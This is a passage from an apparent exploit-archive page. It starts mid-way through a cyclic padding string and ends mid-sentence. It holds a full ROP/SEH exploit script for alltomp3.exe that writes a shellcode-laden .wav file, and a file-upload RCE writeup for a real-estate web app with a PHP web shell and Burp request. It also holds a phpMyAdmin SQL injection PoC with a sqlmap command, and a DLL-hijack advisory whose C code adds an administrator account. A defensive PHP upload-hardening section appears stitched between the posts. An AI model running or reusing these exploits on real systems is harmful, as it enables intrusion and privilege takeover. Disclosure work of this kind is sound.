h5Eh6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em6Em7Em8Em9En0En1En2En3En4En5En6En7En8En9Eo0Eo1Eo2Eo3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9Eq0Eq1Eq2Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0Er1Er2Er3Er4Er5Er6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1Et2Et3Et4Et5Et6Et7Et8Et9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9Ev0Ev1Ev2Ev3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew1Ew2Ew3Ew4Ew5Ew6Ew7Ew8Ew9Ex0Ex1Ex2Ex3Ex4Ex5Ex6Ex7Ex8Ex9Ey0Ey1Ey2Ey3Ey4Ey5Ey6Ey7Ey8Ey9Ez0Ez1Ez2Ez3Ez4Ez5Ez6Ez7Ez8Ez9Fa0Fa1Fa2Fa3Fa4Fa5Fa6Fa7Fa8Fa9Fb0Fb1Fb2Fb3Fb4Fb5Fb6Fb7Fb8Fb9Fc0Fc1Fc2Fc3Fc4Fc5Fc6Fc7Fc8Fc9Fd0Fd1Fd
2Fd3Fd4Fd5Fd6Fd7Fd8Fd9Fe0Fe1Fe2Fe3Fe4Fe5Fe6Fe7Fe8Fe9Ff0Ff1Ff2Ff3Ff4Ff5Ff6Ff7Ff8Ff9Fg0Fg1<br /><br />####################### STACK PIVOT ###########################<br />SEH = struct.pack("<I", 0x005CE870) # 0x005CE870 add esp 0x800, 4 pops, ret [alltomp3.exe]<br /><br />####################### 1. Get Stack Pointer to point to ZZZZ ###########################<br />ROP = struct.pack("<I", 0x0042C7CB) # 0x0042C7CB # PUSH ESP # POP EDI # POP ESI # POP EBX # RETN [Module : Alltomp3.exe] ** Null byte **<br />ROP += b"A" * 8 <br />ROP += struct.pack("<I", 0x1003176D) # 0x1003176D # MOV EAX,EDI # POP ESI # RETN [Module : lame_enc.dll] ** <br />ROP += b"A" * 4<br />ROP += struct.pack("<I", 0x1002fc2a) # 0x1002fc2a: pop edi ; ret ; (1 found)<br />ROP += struct.pack("<I", 0xffffff1c)<br />ROP += struct.pack("<I", 0x10035015) # 0x10035015: add eax, edi ; pop edi ; pop esi ; pop ebx ; pop ebp ; ret ; (1 found)<br />ROP += struct.pack("<I", 0x41414141)*4<br />ROP += struct.pack("<I", 0x100322fd) # 0x100322fd: mov ecx, eax ; mov eax, esi ; pop esi ; retn 0x0010 ; (1 found)<br />ROP += b"A" * 4<br /># ecx points to ZZZZ<br /><br />####################### 2. Get and set ZZZZ to HeapCreate ###########################<br />ROP += struct.pack("<I", 0x1003c452) # 0x1003c452: pop eax ; ret ; (1 found) [Module : lame_enc.dll]<br />ROP += b"A" * 0x10<br />ROP += struct.pack("<I", 0x1003D058) # HEAPCREATE IAT<br />ROP += struct.pack("<I", 0x10033344) # 0x10033344: mov eax, dword [eax] ; pop esi ; ret ; (1 found) [Module : lame_enc.dll]<br />ROP += struct.pack("<I", 0x41414141)<br /># eax has HeapCreate<br />ROP += struct.pack("<I", 0x1003303A) # 0x1003303A # MOV DWORD PTR DS:[ECX],EAX # RETN [Module : lame_enc.dll] ** <br />ROP += struct.pack("<I", 0x100345ee)*4 # 0x100345ee: add eax, 0x04B60F10 ; inc ecx ; and eax, 0x04 ; ret ; (1 found) [Module : lame_enc.dll]<br /><br />####################### 3. 
Set RET ###########################<br />ROP += struct.pack("<I", 0x1003c452) # 0x1003c452: pop eax ; ret ; (1 found)<br />ROP += struct.pack("<I", 0x1001939e) # 0x1001939e: add esp, 0x000001A0 ; ret ; (1 found)<br />ROP += struct.pack("<I", 0x1003303A) # 0x1003303A # MOV DWORD PTR DS:[ECX],EAX # RETN [Module : lame_enc.dll] ** <br /><br />####################### 4. Go to HeapCreate ###########################<br />ROP += struct.pack("<I", 0x0042C7CB) # 0x0042C7CB # PUSH ESP # POP EDI # POP ESI # POP EBX # RETN [Module : Alltomp3.exe] ** Null byte **<br />ROP += b"A" * 8 <br />ROP += struct.pack("<I", 0x1003176D) # 0x1003176D # MOV EAX,EDI # POP ESI # RETN [Module : lame_enc.dll] ** <br />ROP += b"A" * 4<br />ROP += struct.pack("<I", 0x1002fc2a) # 0x1002fc2a: pop edi ; ret ; (1 found)<br />ROP += struct.pack("<I", 0xfffffea4)<br />ROP += struct.pack("<I", 0x10035015) # 0x10035015: add eax, edi ; pop edi ; pop esi ; pop ebx ; pop ebp ; ret ; (1 found)<br />ROP += struct.pack("<I", 0x41414141)*4<br />ROP += struct.pack("<I", 0x005f5548) # 0x005f5548: xchg eax, esp ; ret ; (1 found)<br />ROP += struct.pack("<I", 0x1002a3b5)*10 # 0x1002a3b5: ret ; (1 found) // pad it<br /># when heap create finishes, eax will have hHeap<br />ROP += struct.pack("<I", 0x10020004) # 0x10020004: xchg eax, ebp ; ret ; (1 found)<br /><br />####################### 5. 
Get Stack Pointer to point to YYYY ###########################<br />ROP += struct.pack("<I", 0x0042C7CB) # 0x0042C7CB # PUSH ESP # POP EDI # POP ESI # POP EBX # RETN [Module : Alltomp3.exe] ** Null byte **<br />ROP += b"A" * 8 <br />ROP += struct.pack("<I", 0x1003176D) # 0x1003176D # MOV EAX,EDI # POP ESI # RETN [Module : lame_enc.dll] ** <br />ROP += b"A" * 4<br />ROP += struct.pack("<I", 0x10004f62) # 0x10004f62: pop ebx ; ret ; (1 found)<br />ROP += struct.pack("<I", 0xfffffe58)<br />ROP += struct.pack("<I", 0x10007d44) # 0x10007d44: add eax, ebx ; pop ebx ; add esp, 0x08 ; ret ; (1 found)<br />ROP += struct.pack("<I", 0x41414141)*3<br />ROP += struct.pack("<I", 0x100322fd) # 0x100322fd: mov ecx, eax ; mov eax, esi ; pop esi ; retn 0x0010 ; (1 found)<br />ROP += b"A" * 4<br /># ecx points to YYYY<br /><br />####################### 6. Get and set YYYY to HeapAlloc ###########################<br />ROP += struct.pack("<I", 0x1003c452) # 0x1003c452: pop eax ; ret ; (1 found) [Module : lame_enc.dll]<br />ROP += b"A" * 0x10<br />ROP += struct.pack("<I", 0x1003D014) # HEAPALLOC IAT<br />ROP += struct.pack("<I", 0x10033344) # 0x10033344: mov eax, dword [eax] ; pop esi ; ret ; (1 found) [Module : lame_enc.dll]<br />ROP += struct.pack("<I", 0x41414141)<br /># eax has HeapAlloc<br />ROP += struct.pack("<I", 0x1003303A) # 0x1003303A # MOV DWORD PTR DS:[ECX],EAX # RETN [Module : lame_enc.dll] ** <br />ROP += struct.pack("<I", 0x100345ee)*4 # 0x100345ee: add eax, 0x04B60F10 ; inc ecx ; and eax, 0x04 ; ret ; (1 found) [Module : lame_enc.dll]<br /><br />####################### 7. Set RET ###########################<br />ROP += struct.pack("<I", 0x1003c452) # 0x1003c452: pop eax ; ret ; (1 found)<br />ROP += struct.pack("<I", 0x10014d32) # 0x10014d32: add esp, 0x00000280 ; ret ; (1 found)<br />ROP += struct.pack("<I", 0x1003303A) # 0x1003303A # MOV DWORD PTR DS:[ECX],EAX # RETN [Module : lame_enc.dll] ** <br />ROP += struct.pack("<I", 0x100345ee)*4 # 0x100345ee: add eax, 0x04B60F10 ; inc ecx ; and eax, 0x04 ; ret ; (1 found) [Module : lame_enc.dll]<br /><br />####################### 8. Set hHEAP ###########################<br />ROP += struct.pack("<I", 0x10020004) # 0x10020004: xchg eax, ebp ; ret ; (1 found) <- should return here and start executing here<br />ROP += struct.pack("<I", 0x1003303A) # 0x1003303A # MOV DWORD PTR DS:[ECX],EAX # RETN [Module : lame_enc.dll] ** <br /><br />####################### 9. Go to HeapAlloc ###########################<br />ROP += struct.pack("<I", 0x0042C7CB) # 0x0042C7CB # PUSH ESP # POP EDI # POP ESI # POP EBX # RETN [Module : Alltomp3.exe] ** Null byte **<br />ROP += b"A" * 8 <br />ROP += struct.pack("<I", 0x1003176D) # 0x1003176D # MOV EAX,EDI # POP ESI # RETN [Module : lame_enc.dll] ** <br />ROP += b"A" * 4<br />ROP += struct.pack("<I", 0x1002fc2a) # 0x1002fc2a: pop edi ; ret ; (1 found)<br />ROP += struct.pack("<I", 0xfffffdcc)<br />ROP += struct.pack("<I", 0x10035015) # 0x10035015: add eax, edi ; pop edi ; pop esi ; pop ebx ; pop ebp ; ret ; (1 found)<br />ROP += struct.pack("<I", 0x41414141)*4<br />ROP += struct.pack("<I", 0x005f5548) # 0x005f5548: xchg eax, esp ; ret ; (1 found)<br /># when HeapAlloc returns, eax will hold the address of the allocated buffer<br />ROP += struct.pack("<I", 0x1002a3b5)*20 # 0x1002a3b5: ret ; (1 found) // pad it<br />ROP += struct.pack("<I", 0x10020004) # 0x10020004: xchg eax, ebp ; ret ; (1 found)<br /><br />####################### 10. 
Get Stack Pointer to point to DDDD ###########################<br />ROP += struct.pack("<I", 0x0042C7CB) # 0x0042C7CB # PUSH ESP # POP EDI # POP ESI # POP EBX # RETN [Module : Alltomp3.exe] ** Null byte **<br />ROP += b"A" * 8 <br />ROP += struct.pack("<I", 0x1003176D) # 0x1003176D # MOV EAX,EDI # POP ESI # RETN [Module : lame_enc.dll] ** <br />ROP += b"A" * 4<br />ROP += struct.pack("<I", 0x10004f62) # 0x10004f62: pop ebx ; ret ; (1 found)<br />ROP += struct.pack("<I", 0xfffffd5c)<br />ROP += struct.pack("<I", 0x10007d44) # 0x10007d44: add eax, ebx ; pop ebx ; add esp, 0x08 ; ret ; (1 found)<br />ROP += struct.pack("<I", 0x41414141)*3<br />ROP += struct.pack("<I", 0x100322fd) # 0x100322fd: mov ecx, eax ; mov eax, esi ; pop esi ; retn 0x0010 ; (1 found)<br />ROP += b"A" * 4<br /># ecx points to DDDD<br /><br />####################### 12. Set RET ###########################<br />ROP += struct.pack("<I", 0x10020004) # 0x10020004: xchg eax, ebp ; ret ; (1 found)<br />ROP += b"A"*0x10<br />ROP += struct.pack("<I", 0x1003303A) # 0x1003303A # MOV DWORD PTR DS:[ECX],EAX # RETN [Module : lame_enc.dll] ** <br />ROP += struct.pack("<I", 0x10020004) # 0x10020004: xchg eax, ebp ; ret ; (1 found)<br />ROP += struct.pack("<I", 0x100345ee)*4 # 0x100345ee: add eax, 0x04B60F10 ; inc ecx ; and eax, 0x04 ; ret ; (1 found) [Module : lame_enc.dll]<br /><br />####################### 13. DESTIN ###########################<br />ROP += struct.pack("<I", 0x10020004) # 0x10020004: xchg eax, ebp ; ret ; (1 found)<br />ROP += struct.pack("<I", 0x1003303A) # 0x1003303A # MOV DWORD PTR DS:[ECX],EAX # RETN [Module : lame_enc.dll] ** <br />ROP += struct.pack("<I", 0x10020004) # 0x10020004: xchg eax, ebp ; ret ; (1 found)<br />ROP += struct.pack("<I", 0x100345ee)*8 # 0x100345ee: add eax, 0x04B60F10 ; inc ecx ; and eax, 0x04 ; ret ; (1 found) [Module : lame_enc.dll]* <br /><br />####################### 14. 
SOURCE ###########################<br />ROP += struct.pack("<I", 0x0042C7CB) # 0x0042C7CB # PUSH ESP # POP EDI # POP ESI # POP EBX # RETN [Module : Alltomp3.exe] ** Null byte **<br />ROP += b"A" * 8 <br />ROP += struct.pack("<I", 0x1003176D) # 0x1003176D # MOV EAX,EDI # POP ESI # RETN [Module : lame_enc.dll] ** <br />ROP += b"A" * 4<br />ROP += struct.pack("<I", 0x1002fc2a) # 0x1002fc2a: pop edi ; ret ; (1 found)<br />ROP += struct.pack("<I", 0x000000a0)<br />ROP += struct.pack("<I", 0x10035015) # 0x10035015: add eax, edi ; pop edi ; pop esi ; pop ebx ; pop ebp ; ret ; (1 found)<br />ROP += struct.pack("<I", 0x41414141)*4<br />ROP += struct.pack("<I", 0x1003303A) # 0x1003303A # MOV DWORD PTR DS:[ECX],EAX # RETN [Module : lame_enc.dll] ** <br />ROP += struct.pack("<I", 0x10020004) # 0x10020004: xchg eax, ebp ; ret ; (1 found)<br /><br />####################### 15. GOTO _memcpy_s ###########################<br />ROP += struct.pack("<I", 0x0042C7CB) # 0x0042C7CB # PUSH ESP # POP EDI # POP ESI # POP EBX # RETN [Module : Alltomp3.exe] ** Null byte **<br />ROP += b"A" * 8 <br />ROP += struct.pack("<I", 0x1003176D) # 0x1003176D # MOV EAX,EDI # POP ESI # RETN [Module : lame_enc.dll] ** <br />ROP += b"A" * 4<br />ROP += struct.pack("<I", 0x1002fc2a) # 0x1002fc2a: pop edi ; ret ; (1 found)<br />ROP += struct.pack("<I", 0xfffffc94)<br />ROP += struct.pack("<I", 0x10035015) # 0x10035015: add eax, edi ; pop edi ; pop esi ; pop ebx ; pop ebp ; ret ; (1 found)<br />ROP += struct.pack("<I", 0x41414141)*4<br />ROP += struct.pack("<I", 0x005f5548) # 0x005f5548: xchg eax, esp ; ret ; (1 found)<br /><br />####################### SHELLCODE ###########################<br />shellcode = b"\xcc" * 400<br />real_shellcode = b"\x33\xc9\x64\x8b\x49\x30\x8b\x49\x0c\x8b"<br />real_shellcode += b"\x49\x1c\x8b\x59\x08\x8b\x41\x20\x8b\x09"<br />real_shellcode += b"\x80\x78\x0c\x33\x75\xf2\x8b\xeb\x03\x6d"<br />real_shellcode += b"\x3c\x8b\x6d\x78\x03\xeb\x8b\x45\x20\x03"<br />real_shellcode += 
b"\xc3\x33\xd2\x8b\x34\x90\x03\xf3\x42\x81"<br />real_shellcode += b"\x3e\x47\x65\x74\x50\x75\xf2\x81\x7e\x04"<br />real_shellcode += b"\x72\x6f\x63\x41\x75\xe9\x8b\x75\x24\x03"<br />real_shellcode += b"\xf3\x66\x8b\x14\x56\x8b\x75\x1c\x03\xf3"<br />real_shellcode += b"\x8b\x74\x96\xfc\x03\xf3\x33\xff\x57\x68"<br />real_shellcode += b"\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68"<br />real_shellcode += b"\x4c\x6f\x61\x64\x54\x53\xff\xd6\x33\xc9"<br />real_shellcode += b"\x57\x66\xb9\x33\x32\x51\x68\x75\x73\x65"<br />real_shellcode += b"\x72\x54\xff\xd0\x57\x68\x6f\x78\x41\x01"<br />real_shellcode += b"\xfe\x4c\x24\x03\x68\x61\x67\x65\x42\x68"<br />real_shellcode += b"\x4d\x65\x73\x73\x54\x50\xff\xd6\x57\x68"<br />real_shellcode += b"\x72\x6c\x64\x21\x68\x6f\x20\x57\x6f\x68"<br />real_shellcode += b"\x48\x65\x6c\x6c\x8b\xcc\x57\x57\x51\x57"<br />real_shellcode += b"\xff\xd0\x57\x68\x65\x73\x73\x01\xfe\x4c"<br />real_shellcode += b"\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78"<br />real_shellcode += b"\x69\x74\x54\x53\xff\xd6\x57\xff\xd0"<br /><br />####################### CONSTRUCT ###########################<br />SIZE = 500<br />start_of_padding = b"A" * (SIZE-len(EXE)-len(shellcode))<br />start_of_padding += shellcode<br />start_of_padding += EXE<br /><br />SIZE = 1500<br />RET_NOP_TO_ROP = b"A" * 0x70 + struct.pack("I", 0x1003c6aa) * 10 # RET<br />#INT = struct.pack("I", 0x1000f2b3) + b"BBBB" # 0x1000f2b3: int3 ; pop esi ; ret ; (1 found)<br />INT = struct.pack("I", 0x1003c6aa)*2<br /><br />rest_of_payload = RET_NOP_TO_ROP + INT + ROP # 160 + 14*4 + 172<br />rest_of_payload += b"\x90" * 100<br />rest_of_payload += real_shellcode<br />rest_of_payload += b"\x90" * (SIZE-len(rest_of_payload))<br /><br />payload = junk + SEH + start_of_padding + rest_of_payload<br /><br />REST = b"\x44" * (size-len(payload))<br />payload += REST<br /><br />file = open("1.wav", "wb")<br />file.write(payload)<br />file.close()<br /> <br /></code></pre>
<pre><code># Exploit Title: Real Estate Management System v1.0 - Remote Code Execution via File Upload<br /># Date: 2/11/2024<br /># Exploit Author: Diyar Saadi<br /># Vendor Homepage: https://codeastro.com<br /># Version: V1.0<br /># Tested on: Windows 11 + XAMPP 8.0.30 + Burp Suite Professional v2023.12.1.3<br /><br /><br />## Description ## <br /><br />This vulnerability allows an attacker to upload a malicious file to the web server and execute command injection payloads through it.<br /><br />-----------------------------------------------------------------------------------------------------------------------<br /><br /><br />## Simple RCE Payload : ##<br /><br /><html><br /><body><br /><form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"><br /><input type="TEXT" name="cmd" autofocus id="cmd" size="80"><br /><input type="SUBMIT" value="Execute"><br /></form><br /><pre><br /><?php<br /> if(isset($_GET['cmd']))<br /> {<br /> system_payload($_GET['cmd']);<br /> }<br />?><br /></pre><br /></body><br /></html><br />-----------------------------------------------------------------------------------------------------------------------<br />## Steps to Reproduce ## <br /><br />1- Open Burp Suite ( Community + Professional ) + Click on Proxy Tab Then Enable Intercept By Clicking on Intercept is off .<br />2- Open The Browser From Proxy Tab Then Open The Register Web Page : http://localhost:8080/realestate/register.php<br />3- Prepare Your RCE PHP Script Base From Notepad or Any Editor Then Save the RCE PHP Script Base as : avatar.php filename . <br />4- Change The Filename extension into avatar.png , after saving the RCE PHP Script .<br />5- Click Choose File From User Image Section Then Upload Your avatar.png file .<br />6- Click Register Then Back to Burp Suite Proxy Tab :<br />7- Modify File Extension Into Original File Extension that is : avatar.php in Example : Content-Disposition: form-data; name="uimage"; filename="avatar.png"<br />Content-Type: image/png . 
<br />8- After Modifying The Content-Disposition From Burp Suite Proxy Tab Into Original File Extension Click Forward Button . <br />9- Open The Login Page : http://localhost:8080/realestate/login.php Then Register Through Your Account Email & Password .<br />10 - From MenuBar Click My Account & Profile Then Right Click at Image Icon > Copy Link > New Tab > Paste > Your Malicious Command is Ready To Execute .!<br /><br />-----------------------------------------------------------------------------------------------------------------------<br /><br /><br />## Burp Request : ##<br /><br />POST /realestate/register.php HTTP/1.1<br />Host: localhost<br />Content-Length: 1100<br />Cache-Control: max-age=0<br />sec-ch-ua: "Chromium";v="121", "Not A(Brand";v="99"<br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: "Windows"<br />Upgrade-Insecure-Requests: 1<br />Origin: http://localhost<br />Content-Type: multipart/form-data; boundary=----WebKitFormBoundarywA99kZOAu8APGlhv<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Referer: http://localhost/realestate/register.php<br />Accept-Encoding: gzip, deflate, br<br />Accept-Language: en-US,en;q=0.9<br />Connection: close<br /><br />------WebKitFormBoundarypgW90eleiRxRzcEK<br />Content-Disposition: form-data; name="name"<br /><br />johnhamosh<br />------WebKitFormBoundarypgW90eleiRxRzcEK<br />Content-Disposition: form-data; name="email"<br /><br />rasu1l@in.com<br />------WebKitFormBoundarypgW90eleiRxRzcEK<br />Content-Disposition: form-data; name="phone"<br /><br />+199988764<br />------WebKitFormBoundarypgW90eleiRxRzcEK<br />Content-Disposition: form-data; name="pass"<br /><br 
/><html> <body> <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"> <input type="TEXT" name="cmd" autofocus id="cmd" size="80"> <input type="SUBMIT" value="Execute"> </form> <pre> <?php if(isset($_GET['cmd'])) { system($_GET['cmd']); } ?> </pre> </body> </html><br />------WebKitFormBoundarypgW90eleiRxRzcEK<br />Content-Disposition: form-data; name="utype"<br /><br />user<br />------WebKitFormBoundarypgW90eleiRxRzcEK<br />Content-Disposition: form-data; name="uimage"; filename="avatar.php"<br />Content-Type: image/png<br /><br /><html><br /><body><br /><form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"><br /><input type="TEXT" name="cmd" autofocus id="cmd" size="80"><br /><input type="SUBMIT" value="Execute"><br /></form><br /><pre><br /><?php<br /> if(isset($_GET['cmd']))<br /> {<br /> system($_GET['cmd']);<br /> }<br />?><br /></pre><br /></body><br /></html><br />------WebKitFormBoundarypgW90eleiRxRzcEK<br />Content-Disposition: form-data; name="reg"<br /><br />Register<br />------WebKitFormBoundarypgW90eleiRxRzcEK--<br /><br />-----------------------------------------------------------------------------------------------------------------------<br /><br /><br />## PoC Simple RCE Through This Vulnerability : ##<br /><br />Directory of C:\xampp\htdocs\realestate\admin\user <br /> ..<br />02/11/2024 08:09 PM 315 avatar.php<br />02/11/2024 08:04 PM 315 avatar.png<br />02/11/2024 06:54 PM 9,376 avatarm2-min.jpg<br />02/11/2024 06:54 PM 13,186 avatarm7-min.jpg<br />02/11/2024 07:47 PM 1,814 avatars.php<br />02/11/2024 06:54 PM 1,313 gr7.png<br />02/11/2024 07:36 PM 28 poc.php<br /><br />-----------------------------------------------------------------------------------------------------------------------<br /><br /><br />## Video PoC : ##<br /><br />1- https://github.com/vulnerablecms/RCE-RealEstateVIDEOPOC/blob/main/PoC-RCE.mp4<br />2- https://gofile.io/d/AEWEgI<br 
/>-----------------------------------------------------------------------------------------------------------------------<br /><br /><br />Greetz !<br /><br /></code></pre>
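The root cause in the advisory above is that register.php stores the avatar under whatever filename and extension the multipart request claims, so a single edit in the proxy turns avatar.png back into avatar.php inside the web root. The following is an added example, not code from the Real Estate Management System or its author, showing how that upload step is hardened: the type is decided from the bytes of the file, the stored name is chosen by the server, and the client's filename and Content-Type are never used. The field name "uimage" and the admin/user directory come from the advisory; the function name, the size limit and the error handling are assumptions for illustration, and the function generalises to any image upload field, not only the avatar.

```php
<?php
// Added example (not part of the Real Estate Management System code base):
// a hardened replacement for the avatar upload step. Field name "uimage"
// and the admin/user directory are taken from the advisory; everything
// else here is assumed for illustration.

declare(strict_types=1);

/**
 * Validate one uploaded image and store it under a server-chosen name.
 * Returns the stored file name; throws RuntimeException on any rejection.
 */
function store_avatar(array $file, string $uploadDir, int $maxBytes = 2 * 1024 * 1024): string
{
    // 1. Reject anything PHP itself flagged as a failed or partial upload.
    if (!isset($file['error']) || $file['error'] !== UPLOAD_ERR_OK) {
        throw new RuntimeException('Upload failed or missing');
    }
    // 2. Only accept a file that really arrived through this HTTP request.
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('Not an uploaded file');
    }
    if ($file['size'] === 0 || $file['size'] > $maxBytes) {
        throw new RuntimeException('Unexpected file size');
    }

    // 3. Decide the type from the bytes on disk, never from the client's
    //    filename or Content-Type header (both were attacker-controlled in the PoC).
    $allowed = [
        'image/png'  => 'png',
        'image/jpeg' => 'jpg',
        'image/gif'  => 'gif',
    ];
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($file['tmp_name']);
    if (!isset($allowed[$mime])) {
        throw new RuntimeException('Disallowed content type');
    }
    // 4. Require that the file parses as an image at all. A PHP script with
    //    no image header fails here; a polyglot (valid PNG with PHP appended)
    //    does not, which is why step 6 and the directory rule below matter.
    if (@getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('File is not a valid image');
    }

    // 5. Server-chosen name: random, with a single extension taken from the
    //    detected type, so "avatar.php" can never reach the disk.
    $name = bin2hex(random_bytes(16)) . '.' . $allowed[$mime];
    $dest = rtrim($uploadDir, '/') . '/' . $name;

    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('Could not store file');
    }
    // 6. Stored uploads are data, not code: no execute bit, not writable by the web user.
    chmod($dest, 0644);
    return $name;
}

// Illustrative use inside register.php (assumed call site):
// try {
//     $avatar = store_avatar($_FILES['uimage'], __DIR__ . '/admin/user');
// } catch (RuntimeException $e) {
//     http_response_code(400);
//     exit('Invalid image upload');
// }
```

Pair this with a directory rule: the upload folder should either sit outside the document root and be served through a script that sets Content-Type itself, or carry an .htaccess that turns the PHP handler off (for Apache/XAMPP, `php_flag engine off` and `RemoveHandler .php .phtml`). The content check stops plain scripts; the directory rule is what stops a polyglot that passes getimagesize.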
<pre><code># Exploit Title: XAMPP - Error Based SQL Injection<br /># Date: 02/2024<br /># Exploit Author: Andrey Stoykov<br /># Version: 5.6.40<br /># Tested on: Ubuntu 22.04<br /># Blog: http://msecureltd.blogspot.com<br /><br />Steps to Reproduce:<br /><br />1. Log in to phpMyAdmin<br />2. Visit Export > New Template > test > Create<br />3. Navigate to "Existing Templates"<br />4. Select template "test" and click "Update"<br />5. Trap HTTP POST request<br />6. Place a single quote in the "templateId" parameter<br /><br /><br />// HTTP POST request<br /><br />POST /phpmyadmin/tbl_export.php HTTP/1.1<br />Host: 192.168.159.128<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36<br />(KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36<br />[...]<br /><br />ajax_request=true&server=1&db=&table=&exportType=server&templateAction=load&templateId=1'&_nocache=170904357625092438&token=%5D%7BwM4%22xq%26%3C%7Fioycy<br /><br /><br />// HTTP response<br /><br />HTTP/1.1 200 OK<br />Date: Tue, 27 Feb 2024 16:44:09 GMT<br />Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev<br />Perl/v5.16.3<br />X-Powered-By: PHP/5.6.40<br />[...]<br /><br />{"success":false,"error":"#1064 - You have an error in your SQL syntax;<br />check the manual that corresponds to your MariaDB server version for the<br />right syntax to use near '\\' AND `username` = 'root'' at line 1"}<br /><br />sqlmap -r request.txt --dbms=mysql --threads 10 --level 5 --risk 3<br />--fingerprint<br /><br />[...]<br />[16:55:00] [INFO] confirming MySQL<br />[16:55:01] [INFO] the back-end DBMS is MySQL<br />[16:55:01] [INFO] actively fingerprinting MySQL<br />[16:55:02] [INFO] executing MySQL comment injection fingerprint<br />web application technology: PHP 5.6.40, Apache 2.4.37<br />back-end DBMS: active fingerprint: MySQL >= 5.5<br /> comment injection fingerprint: MySQL 5.6.52<br /> fork fingerprint: MariaDB<br />[...]<br /><br /></code></pre>
<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20240226-0 ><br />=======================================================================<br /> title: Local Privilege Escalation via DLL Hijacking<br /> product: Qognify VMS Client Viewer<br /> vulnerable version: >=7.1<br /> fixed version: see solution<br /> CVE number: CVE-2023-49114<br /> impact: medium<br /> homepage: https://www.qognify.com/<br /> found: 2023-11-23<br /> by: Sandro Einfeldt (Office Munich)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Eviden business<br /> Europe | Asia<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"Qognify, part of Hexagon, helps customers minimize the impact of security,<br />safety and operational incidents. Qognify’s comprehensive portfolio of video<br />management software and enterprise incident management solutions serve<br />thousands of customers around the world in manufacturing, transportation,<br />retail, education, finance, logistics, corrections, critical infrastructure<br />and government."<br /><br />Source: https://www.qognify.com/about-us/<br /><br /><br />Business recommendation:<br />------------------------<br />The vendor provides a hardening guide for their customers which should be<br />implemented to ensure that no DLLs can be preloaded.<br /><br />SEC Consult highly recommends performing a thorough security review of the product<br />conducted by security professionals to identify and resolve potential further<br />security issues.<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) Local Privilege Escalation via DLL Hijacking (CVE-2023-49114)<br />The Qognify VMS Client/Viewer application (VMS_Client.exe) is vulnerable to DLL<br />Hijacking. 
The application tries to load multiple DLL files from the DLL search<br />order without success. At least one of the missing DLL files can be hijacked.<br />This might allow malicious actors with low privileges on a Windows system to<br />escalate privileges if some specific pre-conditions are met:<br /><br />1. The attacker can drop a DLL file in a folder within the DLL search<br />order (This circumstance is based on a configuration issue in the Windows file<br />system permissions and is beyond the attacker's control.).<br />2. A high privileged user starts the VMS_Client.exe FAT client application.<br /><br /><br />Proof of concept:<br />-----------------<br />1) Local Privilege Escalation via DLL Hijacking (CVE-2023-49114)<br />For successful exploitation, the attacker needs write-access to one of the<br />following directories in the DLL search order:<br /><br />1. The directory from which the application loaded<br />2. The system directory<br />3. The 16-bit system directory<br />4. The Windows directory<br />5. The current working directory (CWD)<br />6. The directories that are listed in the PATH environment variable<br /><br />The attacker can use the following malicious C-code to create a POC exploit:<br /><br />#include <windows.h><br />BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved){<br /> if (dwReason == DLL_PROCESS_ATTACH){<br /> system("cmd.exe /C net user secconsult P@ssW0rd1sSup3rS6curE /add /Y");<br /> system("cmd.exe /C net localgroup administrators secconsult /add");<br /> ExitProcess(0);<br /> }<br /> return TRUE;<br />}<br /><br />The following command can be used to compile the code and create the DLL file:<br /><br />x86_64-w64-mingw32-gcc CRYPTBASE.c -shared -o CRYPTBASE.dll<br /><br />Next, the CRYPTBASE.dll file has to be dropped into one of the previously<br />mentioned folders of the DLL search order. 
If a user with local administrative<br />permissions starts the VMS Client/Viewer FAT client application, CRYPTBASE.dll<br />gets loaded and the malicious code gets executed with high privileges. In this<br />POC, the user 'secconsult' is created and added to the group of local<br />administrators. By following this approach, the attacker is able to escalate<br />privileges.<br /><br /><br />Vulnerable / tested versions:<br />-----------------------------<br />The following version has been tested which was the latest version available<br />at the time of the test:<br />* 7.2<br /><br />According to the vendor, all versions starting from 7.1 are affected. Users<br />should implement the hardening guide.<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2024-01-17: Contacting vendor through supportCY@qognify.com<br />2024-01-17: Very quick vendor support response, asking for general information<br /> about the vulnerability, to be able to assign the correct internal<br /> team.<br />2024-01-17: Sending vendor 